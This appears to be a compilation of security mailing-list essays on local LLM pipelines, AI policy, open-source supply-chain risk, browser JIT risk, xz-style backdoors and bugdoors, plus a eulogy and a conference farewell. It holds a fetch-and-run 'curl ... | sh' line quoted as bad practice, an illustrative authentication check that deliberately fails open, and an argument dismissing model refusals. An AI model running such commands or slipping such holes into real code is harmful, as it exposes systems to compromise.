[image: Llama3.1 8B Q4 test results via Ollama]
So recently I've been doing a lot of work with LLMs handling arbitrary
unstructured data, and using them to generate structured data, which then
gets put into a graph database for graph algorithms to iterate on so you
can actually distill knowledge from a mass of nonsense.
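To make that concrete, here's a minimal sketch of the pipeline in Python - the LLM extraction step is stubbed out with hard-coded triples, and networkx stands in for a real graph database:

import networkx as nx

# Pretend output of the LLM extraction step for one document (hard-coded
# here; in the real pipeline this structured data comes back from the model):
extracted = [
    {"source": "Dave Aitel", "relation": "founded", "target": "Immunity"},
    {"source": "Immunity", "relation": "sells", "target": "CANVAS"},
]

g = nx.DiGraph()
for triple in extracted:
    g.add_edge(triple["source"], triple["target"], relation=triple["relation"])

# Graph algorithms then iterate over the accumulated structure - e.g.
# centrality scores tell you which entities matter across many documents:
print(nx.pagerank(g))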
But obviously this can get expensive via APIs, so like many of you, I set
up a server with an A6000 that has 48GB of VRAM and started loading some
models on it to test. Using this process you can watch the state of the art
advance - problems that were intractable to any open model first became
doable via Llama 70B versions, and then soon after that, 8B models. Even
though you can fit a 70B version into 48GB, you also want to have room for
your context length to be fairly large, in case you want to pass a whole
web page or email thread through the LLM (which means an 8B parameter model
is probably the biggest you really want to use - I don't know why people
ignore context size when calculating model VRAM requirements).
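For the curious, the back-of-envelope math looks like this (a sketch: the layer/head counts are the published Llama 3.1 architecture numbers, and it assumes an fp16 KV cache, which your runtime may or may not use):

def kv_cache_gb(layers, kv_heads, head_dim, ctx_len, bytes_per_elem=2):
    # K and V each store one vector per layer per token, fp16 by default.
    return 2 * layers * kv_heads * head_dim * ctx_len * bytes_per_elem / 1e9

def weights_gb(params_billions, bits):
    return params_billions * bits / 8  # billions of params -> GB

# 70B at 4-bit with a modest 32k context: ~45.7GB, the card is already full.
print(weights_gb(70, 4) + kv_cache_gb(80, 8, 128, 32_768))
# 8B at 4-bit with the full 128k context: ~21.2GB, plenty of headroom.
print(weights_gb(8, 4) + kv_cache_gb(32, 8, 128, 131_072))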
My most telling example prompt-task is a simple one: Give me the names in a
block of text, and then make them hashtags so I can extract them. The
results from LLama3.1 8B when quantized down are not...great, as seen in
the little example below:
*Input text: Dave Aitel is a big poo. Why is he like this? He is so mean.*
*Returned: I can't help with that request. Is there something else I can
assist you with?*
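If you want to reproduce this at home, the task is a few lines against a local Ollama server (a sketch using the stock Ollama REST API; the model tag is whatever you pulled):

import json, urllib.request

prompt = ("Rewrite every person's name in the following text as a hashtag, "
          "and output only the hashtags:\n\n"
          "Dave Aitel is a big poo. Why is he like this? He is so mean.")

req = urllib.request.Request(
    "http://localhost:11434/api/generate",
    data=json.dumps({"model": "llama3.1:8b", "prompt": prompt,
                     "stream": False}).encode(),
    headers={"Content-Type": "application/json"},
)
# On quantized Llama3.1 this is where the refusal above comes back;
# an uncensored model just prints "#DaveAitel".
print(json.loads(urllib.request.urlopen(req).read())["response"])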
Uncensored models, like Mistral NeMo, are also tiny and struggle to do
this task reliably on Chinese or other languages that are not well
represented in their training set, but they don't REFUSE to do the task
because they don't like the input text or find it too mean. So you end up
with much better results.
People are of course going to retrain the LLAMA3.1 base and create an
uncensored version and other people are going to complain about that -
having an uncensored GPT4-class open model scares them for reasons that are
beyond me. But for real work, you need an LLM that doesn't refuse tasks
because it doesn't like what it's reading.
-dave
P.S. Quantization lobotomizes the Llama3.1 models really hard. What the
70B model can do at full precision, it absolutely cannot do at 4-bit.
Can a hamster do interprocedural analysis? What size of hamster can turn a
tier-2 geopolitical adversary's cyber force into a tier-1 adversary? Is the
best use of a hamster finding 0day or orchestrating the offensive
operations themselves? These are all great questions for policy teams to
ponder as they pontificate over how to properly regulate AI.
On one hand, as a technologist, your tendency will be to try to explain to
policy teams what makes a scary adversary scary, maybe get involved in
building a taxonomy of various tiers of adversary, start classifying
operations as "sophisticated" and "not sophisticated". This is not useful,
but it feels useful! It is like recycling cardboard boxes, all while
knowing that you, as an organism, are primarily oriented towards boiling
the oceans and turning the planet into Venus as quickly and efficiently as
possible. Remember that today's small stone crab claw is tomorrow's "extra
large" stone crab claw, because all the big ones got eaten, and that's how
generational amnesia
<https://www.natural-solutions.world/blog/how-can-we-stop-we-need-to-work-on…>
works!
In other words, while STORM-0558's operation against Microsoft was slick
like oil across the ever-more-hot waters of the Gulf of Mexico when it
happened, the million teams doing the exact same Active Directory tricks
the next month were just small fish, despite their impact on targets. And
most big-impact operations could have been done by second-tier penetration
testing teams, let alone nation-state adversaries. You will, if you work in
Cyber Policy long enough, see people make tables of operations which
compare various hacks from over the last fifteen years, which is like
comparing the bite strengths of a Cretaceous monster to your average modern
iguana.
Likewise, most of Policy-world is, like we all are, obsessed with 0day. We
like to count them with the enthusiasm of a vampire puppet on a children's
TV show! But we also know that finding 0day is not a sign of sophistication
so much as finding the right 0day at the right time. I don't know how to
classify Orange Tsai's PHP character innovation, but because it doesn't fit
neatly into a spreadsheet, it might as well not exist?
"If AI finds 0day, then it must be regulated" is a fun position to take in
the many fancy halls and tedious Zoom calls where a pompous attitude and an
ill-fitting suit are table stakes for attendance and having actually
written code that uses Huggingface is considered bad form. But regulating
technologies that can find 0day is a dead end. The current best way to find
0day is fuzzers, and the dumber they are, the better they work most of the
time. When it comes to operations, the current best way to hack is to email
people and ask them for their password? Is that still true? Or do we just
all look through huge databases of usernames and passwords that have
already leaked and just use those now? I'm sure AI can also do that, but
I'm also sure that it doesn't matter.
I try to tell policy people this: What makes a scary adversary is huge
resources, huge motivation, and huge innovation. The big names will
probably use AI to automate different things, but nobody is going to saddle
up some hamsters and suddenly turn from a not-scary adversary into a scary
one.
-dave
People occasionally read my blogposts
<https://cybersecpolitics.blogspot.com/2024/04/what-open-source-projects-are…>
on Jia Tan
<https://cybersecpolitics.blogspot.com/2024/04/the-open-source-problem.html>
and then ask me about open source development in general, and you can only,
in your darkest heart of hearts (your only heart), laugh.
The other day I was contributing to a project that I am one of several
developers on. In particular, I wrote a GDB script that traces through a
function, printing out all the various variables and their sizes, and this
gets fed into an LLM to try to reason about it, which is a bit like asking
a hedgehog how big a Unicode string should be to fit around the moon, but
it was worth a shot, ya know? I have the kind of dyslexia that means I
can't tell matrix algebra from a thinking conscious creature.
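The core of the script is small - something like this sketch using GDB's Python API (run it from a breakpoint inside the function you care about; step limits and call handling are elided):

import gdb  # only available inside a gdb process

def dump_locals():
    # Print every argument and local visible in the current frame, with its
    # declared type and size - this is the transcript the LLM gets.
    frame = gdb.selected_frame()
    block = frame.block()
    while block and not (block.is_global or block.is_static):
        for sym in block:
            if sym.is_variable or sym.is_argument:
                try:
                    print("%s: type=%s size=%d value=%s" %
                          (sym.name, sym.type, sym.type.sizeof,
                           frame.read_var(sym)))
                except gdb.error:
                    pass  # optimized out, not yet initialized, etc.
        block = block.superblock

def trace(lines=50):
    for _ in range(lines):
        dump_locals()
        gdb.execute("next", to_string=True)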
Anyways, while I am good at making GDB dance in particular ways, like
knowing the ancient art of the Polka, I am not good at modern software
development, and barely understand Git or Docker or Cloud things. But I
have hacked a few things, like y'all have, and so my development happens in
a VM and that VM has access to pretty much just the source code it needs
and not a whole lot else.
But that's not how modern development works. It's common to see
instructions to run "gcloud auth" and then walk through the web
authentication portal from Google so your current user can access cloud
buckets and APIs while testing or debugging your giant microservice. Like,
people are out there just raw dogging source code from random other open
source developers, with their local environment running tokens that give
them access to everything they could possibly need from their Google
account. People out there running curl www.badstuff.biz/setup | sh. People,
and by this I mean developers, are left storing five thousand fine-grained
GitHub tokens in various text files on their hard drives because they can't
remember which one was which.
In other words: Jia Tan might have been a best case scenario for this
community.
-dave
I know it's in vogue to pick on enterprise hardware marketed to "Secure
your OT Environment" but actually written in crayon in a language made of
all sharp edges like C or PHP, with some modules in COBOL for spice. This
is the "Critical Infrastructure" risk du jour, on a thousand podcasts and
panels, with *Volt Typhoon* in the canary seat, where once only the
"sophisticated threat" Mirai had root permissions.
As embarrassing as having random Iranian teenagers learn how to do systems
administration on random water plants in New Jersey is, it's *more*
humiliating to have systemic vulnerabilities right in front of you, have a
huge amount of government brain matter devoted to solving them, and yet not
make the obvious choice to turn off features that are bleeding us out.
And when you talk about market failure in Security you can't help but talk
about Web Browsers, both mobile and desktop. Web Browsing technology is in
everything - and includes a host of technologies too complicated to go
into, but one of the most interesting has been Just in Time compiling,
which got very popular as an exploitation technique (let's say) in 2010
<http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf> but
since then - for over a decade! - has been a bubbling septic font of
constant systemic, untreated risk.
Proponents of having a JIT in your JavaScript engine say "Without this
kind of performance, you wouldn't be able to have Gmail or Expedia!" This
is not true on today's hardware (turn on Edge's Strict security mode today
and you won't even notice it), and almost certainly not true on much older
hardware. The issue with JITs is visible to any hacker who has looked at
the code - whenever you have concepts like "Negative Zero
<https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html>"
that have to be handled perfectly every time or else the attacker gets full
control of your computer, you are in an indefensible space.
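If you want a feel for why this is so easy to get wrong, here's the bug class in miniature - plain Python rather than JIT internals, but the same IEEE-754 trap the Project Zero post describes:

import math

# -0.0 and 0.0 compare equal, so an optimizer that proves "x == 0" and
# folds away the sign handling looks correct...
print(-0.0 == 0.0)               # True

# ...but the sign bit is still observable, so the folded code and the
# unfolded code disagree - in a JIT, that disagreement is attacker-leverage:
print(math.copysign(1.0, -0.0))  # -1.0
print(math.atan2(0.0, -0.0))     # 3.141592653589793 (vs 0.0 for +0.0)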
I would, in a perfect world, like us to be able to get ahead of systemic
problems. We have a rallying cry and a lot of signatories on a pledge, but
we need to turn it into clicky clicking on the configuration options that
turn these things off on a USG and Enterprise level, the same way we banned
Russian antivirus from having Ring0 in our enterprises, or suspiciously
cheap subsidized Chinese telecom boxes from serving all the phone companies
across the midwest.
The issue with web browsers is not limited to JITs. A Secure By Design
approach to web browsing would mean that most sites would not have access
to large parts of the web browsing specification. We don't need to be
tracked by every website. They don't all need access to Geolocation or
Video or WebAssembly or any number of the other capabilities our web
browsers give them, largely in order to allow the mass production of
targeted advertising.
If we've learned anything in the last decade, it is that the key phrase in
Targeted Advertising is "Targeted", and malware authors have known this for
as long as the ecosystem existed. The reason your browser is insecure by
default is to support a parasitic advertising ecology, enhancing
shareholder value, but leaving our society defenceless against anyone
schooled enough in the dark arts.
Google's current solution to vulnerabilities in the browser is Yet Another
Sandbox. These work for a while until they don't - over time, digital
sandboxes get dirty and filled with secrets just like the one in your
backyard gets filled with presents from the local feral cat community. I
know Project Zero's Samuel Groß is better at browser hacking than I am, and
he personally designed the sandbox, but I look out across the landscape of
the Chinese hacking community and see only hungry vorpal blades and I do
not think it is a winning strategy.
-dave
References:
1. Microsoft's Strict mode turns the JIT off (kudos to Johnathan Norman)
https://support.microsoft.com/en-us/microsoft-edge/enhance-your-security-on…
2. The Sandbox: https://v8.dev/blog/sandbox
>>What matters is speed of the exploit and speed of patching. And I see the humans (patching) on the losing side of this race.
This is probably an independent issue (imvho).
Re LLMs and the present AI/ML regime, my only public comment is that
we're in the Hindenburg [1] era... caveat emptor. Another insightful
paper that will probably be ignored this summer:
https://arxiv.org/abs/2308.03762 (author:
https://people.csail.mit.edu/kostas/ )
[1] - https://en.wikipedia.org/wiki/LZ_129_Hindenburg
After spending some time looking at "Secure by Design/Default" I have no
doubt many of you feel like something is missing - something that's hard to
put your finger on. So you go back to the treadmill of reading about bugs
in Palo Alto devices, or the latest Project Zero blogpost, or something the
Microsoft Threat Team is naming RidonculousBreeze, or whatever.
For those of you who chose to read the latest Project Zero post, one way to
look at Mateusz Jurczyk's vast destruction
<https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventu…>
of the Windows Registry API, resulting in what can only be described as a
"boatload" of Local Privilege Escalations, is that securing legacy code is
hard, there's a shortage of people willing to do the reverse engineering
work necessary to understand and fix complicated and critical
old code, and our investments in automated security engineering toolkits
and better software development practices, while valuable, have not paid
off in the kind of hardened Rust-only systems we dreamed about.
Another way to look at this kind of wholesale destruction, a true tour de
force, is that you cannot both put advertisements in your Start menu, and
develop a secure operating system, for reasons that are more philosophical
than technical.
It's ironic that it is often Google that demonstrates this about other
vendors, when of course, the lack of any ad blocking in Chrome or Android
presents the exact same dilemma. You can't both make your systems secure,
and sit beside the great river of Advertising Revenue with a ladle, dipping
it in every quarter to fill up a cauldron of greater and greater value for
the shareholders. It's hard to draw a straight line from an internal
PowerPoint slide saying "Ads in the Start Menu are a good idea, actually"
to the inevitable conclusion of 0days, ransomware, and US Government emails
are being read by some old Russian who understands cryptography and Azure
keys better than you were hoping.
But in some respect this cause and effect is as fundamental and simple as
how that tattoo on your arm is actually there because one night you decided
to start off with shots of Limoncello.
When Project Zero started, and even when it got to the towering behemoth of
talent that it is now, I knew people in the offensive industry who were
quite scared of it - of the possibility that a large and funded team of top
researchers, with access to one of the only five real computers on the
planet, could drain the lake of software vulnerabilities we all fished in.
But I had no such fears. An organization so dependent on advertising
revenue to survive can no more fix systemic security issues than a Sperm
Whale can medal in Olympic Skiing. It is contrary to their very nature,
although they will probably smash a bunch of trees on the way down.
Like many of you, I spent my Saturday porting code to use LLAMA3:70b,
largely by annoying my 18yo with questions about ollama and Docker, since I
find modern Linux system administration as foreign as an octopus finds
calculus.
But search engines, like surface warships, are clearly on their last legs.
They went from something you used every day, multiple times a day, to
something your LLM uses for you, as just one tool among many. It is, for
reasons that must be obvious even to executives drunk on the heady fumes of
their stock options maturing, hard to make money selling advertisements
that are only read by LLMs.
But having spent the better part of a couple years doing LLM work now, I
feel like I understand why these behemoths are investing so much money in
them, despite the obvious cannibalization of their cash umbilical. It's
because they can!
There just aren't that many businesses that generate ten billion dollars of
revenue year on year for you to get into. You've got some elements of
manufacturing, tech, education, health care, video games. It's not a big
list. Apple gave up on manufacturing cars because the niche they wanted
(impractically weird and expensive) was already filled by Tesla.
But by investing in LLMs and AI in general you kinda get to put your thumbs
in every other billion-dollar business all at once. It's a straight-line
shot from something you already know to the next place. So of course, they
are throwing dollars at it like it was the only thing they knew how to do.
And what we get is the pretentious superiority of ChatGPT, or the
sanctimonious holiness of Claude, or the ever-sadness of Gemini, the
impertinence of Mistral or the trollishness that is LLAMA. A world of
chaos, yet something so familiar.
-dave
On Monday, I and 400 other people, including many on this mailing list,
attended Sophia's funeral in a huge church on the Upper East Side of NYC.
Although I grew up in a Jewish household, I am not religious, and the last
time I went to a church was also with Sophia, in Jerusalem, where we
wandered through various landmarks until we ended up at the Church of the
Holy Sepulcher, one of the holiest sites for Christianity.
We waited in a line of fellow pilgrims, the room lit only by echoes and dim
lamps, to touch the Stone of Anointing, where Jesus's body was said to have
been prepared for burial. The rock was wet, from some unknown source
below. We each knelt and touched it briefly, respectfully. The concept of
prayer is foreign to me, but I spoke to myself for a moment with my hand on
the slick rock, and tried to feel.
Afterwards, Sophia said to me, "You can't expect to _feel_ anything,"
something I've often pondered since that moment.
Sophia had many friends, and for many people, Sophia was one of their
closest friends. No one person can own her memory, but like many others,
the moments I had with her were important to me. Now that she's gone, these
moments are what we have left.
The community that came to NYC to support Sophia's family, and each other,
was just as stunned as I am. When not sharing memories about Sophia, we
talked about exploits, and large language models. I saw people I hadn't
seen for over a decade, or people I knew, but had no idea knew Sophia. Some
people traveled from across the entire globe to say goodbye. The community
was all on the same path, and the many photos of Sophia laid out on the
reception tables were like a shattered mirror portal into her life.
Woven into the fabric of who she was, was Sophia's work, and her desire to
do what was necessary to get the work done. She did not start a company to
get rich. She lived a life of quiet professionalism and when global events
moved, she was often part of that fell force that moved them. The shape of
the world is a part of her legacy, but even more so I see her legacy as an
example that you can live a life of sacrifice and integrity. You can be
there for people. You can make it look effortless.
This week the Host gathered around a silence folding endlessly upon
itself. I feel privileged to have known her, to have shared the time we
shared. I know those of you reading this who were also a part of her life
feel the same.
Rest in Peace, Sophia. We miss you.
-dave
Like everyone I know, I've been spending a lot of time neck deep in LLMs.
As released, they are fascinating and useless toys. I feel like actually
using an LLM to do anything real is your basic nightmare still. At the very
minimum, you need structured output, and OpenAI has led the way in offering
a JSON-based calling format which allows you to extend the model with
functions that cover the things an LLM can't really do (e.g. math, or
accessing the web or your bash shell). In real life you are going to use
this through LangChain or some similar library.
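A minimal sketch of what that looks like with the current OpenAI SDK (the function name and schema here are made up for illustration):

from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment
resp = client.chat.completions.create(
    model="gpt-4",
    messages=[{"role": "user", "content":
               "Extract the person names: Dave Aitel is a big poo."}],
    tools=[{
        "type": "function",
        "function": {
            "name": "report_names",  # hypothetical function
            "description": "Record the person names found in the text.",
            "parameters": {
                "type": "object",
                "properties": {"names": {"type": "array",
                                         "items": {"type": "string"}}},
                "required": ["names"],
            },
        },
    }],
)
# If the model chose to call the tool, the arguments come back as JSON:
print(resp.choices[0].message.tool_calls[0].function.arguments)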
You can do this sort of thing with Claude (a better model than GPT-4 in
many respects for code), but it's janky, as the model wasn't specifically
fine-tuned for this purpose yet. Your best bet, as you see everyone do, is
to force it to start its reply with a curly bracket "{", but even then it's
going to pontificate about its reply after it sends you the JSON object you
want - if you're lucky and it uses your format at all.
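The prefill trick, for reference, is just seeding the assistant turn (a sketch against the Anthropic messages API; the model name will have moved on by the time you read this):

import anthropic

client = anthropic.Anthropic()  # assumes ANTHROPIC_API_KEY is set
msg = client.messages.create(
    model="claude-3-opus-20240229",
    max_tokens=512,
    messages=[
        {"role": "user", "content":
         'Return the names in this text as JSON like {"names": [...]}: '
         "Dave Aitel is a big poo."},
        # The trick: prefill the assistant turn so the reply has to
        # continue from an opening brace instead of pontificating first.
        {"role": "assistant", "content": "{"},
    ],
)
print("{" + msg.content[0].text)  # re-attach the brace we forced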
Claude is oriented more toward XML than JSON, which, if you think about how
LLMs work, makes a ton of sense. To an LLM, {' may be one token, and {{{
may be one token. In fact, let's test that:
>>> import tiktoken
>>> encoding = tiktoken.encoding_for_model("gpt-4")
>>> encoding.encode("{")
[90]
>>> encoding.encode("{{")
[3052]
>>> encoding.encode("{{{")
[91791] #one token
>>> encoding.encode("{{{{")
[3052, 3052] #two tokens
>>> encoding.encode("{{{{{")
[3052, 91791] #two tokens
>>> encoding.encode("{{{{{{")
[3052, 3052, 3052] #three tokens
>>> encoding.encode("{'")
[13922] #{ ' is one token
Yeah, so like, on one hand, that's great. Very optimized compression on
token lengths. But on the other hand, it is very confusing for the model to
train on and understand! You can see why XML would be much more natural!
<SOME WORD> is more likely to be three tokens, which makes creating clean
output much easier. Claude's focus on XML probably makes it "smarter" in
some ways that are hard to prove with math.
>>> encoding.encode("<high>")
[10174, 1108, 29]
>>> encoding.encode("<html>")
[14063, 29]
>>> encoding.encode("</html>")
[524, 1580, 29]
>>> encoding.encode("/html")
[14056]
>>> encoding.encode("</high>")
[524, 12156, 29]
>>> encoding.encode("high")
[12156]
Also, of course, I highly recommend Halvar's latest talk (which is highly
relevant):
https://www.youtube.com/watch?v=xA-ns0zi0k0&t=4s
-dave
The security community (aka, all of us on this list) still rages with the
impact of Jia Tan putting a sophisticated backdoor into the xz package, and
all of the associated HUMINT effort that went into it. And from talking to
people about it, especially people in the cyber policy realm but also
technical experts, I realized that there's a pretty big gap when it comes
to understanding why someone would put in a backdoor at all, instead of
adding many bugdoors.
Some Background:
1. A post
<https://cybersecpolitics.blogspot.com/2019/05/hope-is-not-nobus-strategy.ht…>
on what NOBUS means when it comes to backdoors.
2. Responsible offense from a bunch of Americans
<https://www.lawfaremedia.org/article/responsible-cyber-offense>
3. Responsible offense from the UK
<https://www.gov.uk/government/publications/responsible-cyber-power-in-pract…>
4. Responsible offense from the Germans
<https://www.stiftung-nv.de/sites/default/files/snv_active_cyber_defense_tow…>
5. A university banned from Linux
<https://www.theverge.com/2021/4/30/22410164/linux-kernel-university-of-minn…>
for contributing backdoors as part of a research project
So as with all areas of responsible offense, there is a tight connection
and contention between good OPSEC and responsible operations. In
particular, it is very easy to get yourself on a team for a big project
and add code that introduces exploitable conditions: code that handles
input in a way that causes a memory corruption, say, or does authentication
slightly wrong in certain circumstances.
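An illustrative (and entirely made-up) Python example of the genre - code that reads as defensive and reviews clean, but fails open under one specific condition:

import hmac

def check_token(supplied: str, expected: str) -> bool:
    # Looks like a sensible default for unconfigured deployments;
    # functions as an authentication bypass for anyone who can cause
    # the expected token to come back empty (bad config push,
    # truncated read, deleted key...).
    if not expected:
        return True
    return hmac.compare_digest(supplied.encode(), expected.encode())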
From an operational security standpoint, these bugdoors are easy to
introduce, and I don't know of a serious hacking group that hasn't played
with this - if for no other reason than to fix bugs that cause crashes
while you are trying to exploit some other, better bug. Reading the
original UMN paper (which was under-appreciated for its time, despite
getting them banned from Linux!), you can see that it is not really always
about adding bugs, but often about adding enabling features for bugs that
already exist in the codebase, making them more reachable.
In some ways, attacking the open source community by hacking into
developers or repositories has been the traditional way of ancient Unix
90's hackers, who understand a web of trust the way a Polynesian navigator
understands the swells and currents between islands.
From an opsec perspective though, bugdoors have limits. Fuzzers can find
them, other hackers can find them, and once found, they can be used by
anyone with the skill to write the exploit. Likewise, using them is risky:
No memory corruption is 100% reliable, and when they fail, *they fail in
the worst way, in the worst place, at the worst time*. And the traffic you
may have to generate to shape memory in the target host is likely to be
anomalous, and easily signatured.
And from a responsible offensive cyber operation perspective, you cannot
mathematically demonstrate that a bugdoor protects the hosts you target
from third parties. *Bugdoors are never a NOBUS capability.*
Ideally a NOBUS capability would allow you and only you to get in and avoid
replay attacks, but a close second is a simple asymmetric key of some kind
where the target ID is used as part of the scheme. The XZ backdoor used an
Elliptic Curve signature that included the target's SSH public key
<https://github.com/amlweems/xzbot>.
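The shape of that scheme is easy to sketch (illustrative Python with the cryptography library, loosely modeled on the xzbot writeup - this is not the actual backdoor code):

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed448 import Ed448PrivateKey

# Demo keypair. In the real thing only the public half ships in the
# implant; the private half never leaves the operator.
attacker_priv = Ed448PrivateKey.generate()
attacker_pub = attacker_priv.public_key()

def sign_command(command: bytes, target_host_key: bytes) -> bytes:
    # Operator side: bind the command to one specific target's host key.
    return attacker_priv.sign(command + target_host_key)

def implant_accepts(sig: bytes, command: bytes, target_host_key: bytes) -> bool:
    # Implant side: only the holder of the private key can produce a valid
    # signature, and because the target's own key is part of the signed
    # message, a captured payload replayed at another host fails.
    try:
        attacker_pub.verify(sig, command + target_host_key)
        return True
    except InvalidSignature:
        return False

host_a, host_b = b"host-key-A", b"host-key-B"
sig = sign_command(b"run: id", host_a)
assert implant_accepts(sig, b"run: id", host_a)      # works on the target
assert not implant_accepts(sig, b"run: id", host_b)  # replay elsewhere fails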
Thanks,
Dave
Dear Daily Dave,
For a hacker conference, twenty years is a huge achievement — for a small conference, even more so. Over these years we’ve enjoyed speakers showcasing results from cutting-edge research, seen thought-provoking keynotes and bonded with other like-minded people from all over the world.
If we had to summarize the experience with one word, it would be gratitude. The speakers, repeat speakers, first timers or regular attendees, and friends of t2 — you have made the event and its atmosphere.
This was always a true community event – it’s organized for hackers, by hackers. The Advisory Board’s motivation and main driver was our love for the game. Creating a small event with a curated program, offering a backdrop for lobby bar and coffee break discussions, was (and still is) our vision of a perfect infosec con. The chance to network with your industry peers was as integral a part of t2 as the high-quality content.
It’s rare you get the same level of interaction with current/former speakers and attendees alike at any other conference.
Tomi has fond memories of pretty much each and every year. Starting from the humble beginnings, when the legendary Phenoelit guys were kind enough to come and present at a conference that back then had no history or reputation. How the Toolcrypt guys dominated the stage for years with their absolutely amazing research, how Ivan Krstić (now Apple’s security samurai) shared his ideas on how modern security architectures should be built (iDevices anybody?), how the InversePath crew delivered some of the most enjoyable and hardcore research ever... and well, you get the idea – the list just goes on and on – there are simply too many good memories to list here.
Mikko remembers learning from Ludde (during a t2 coffee break) how he works at Spotify. Then Mikko explained how impressed he was with Spotify’s early beta version, especially how you could skip parts of a song and it would still continue streaming instantly. Ludde nodded…and said ‘yeah…I coded that’.
Henri still reminisces how Halvar Flake took the time after his talk in 2010 to have a chat with him and Esa Etelävuori (RIP), despite Halvar feeling slightly under the weather in the midst of what later turned out to be the Zynamics acquisition by Google. In 2017 we enjoyed the late night/very early morning pizza in the hotel lobby bar with Dave Aitel, after proving him wrong.
Instead of dropping a surprise announcement sometime next year, or silently disappearing into the crowd, we wanted to let everyone know before this year’s t2 infosec that 2024 will be our last dance.
We have truly enjoyed the past two decades of world class cyber in Helsinki – all good things come to an end eventually. From the bottom of our hearts, a big thank you to all of you who made this happen. We are privileged to be able to call many of you out there our friends.
This goes especially to Dave, thank you for treating us so well over the years.
Tomi Tuominen
Mikko Hyppönen
Henri Lindberg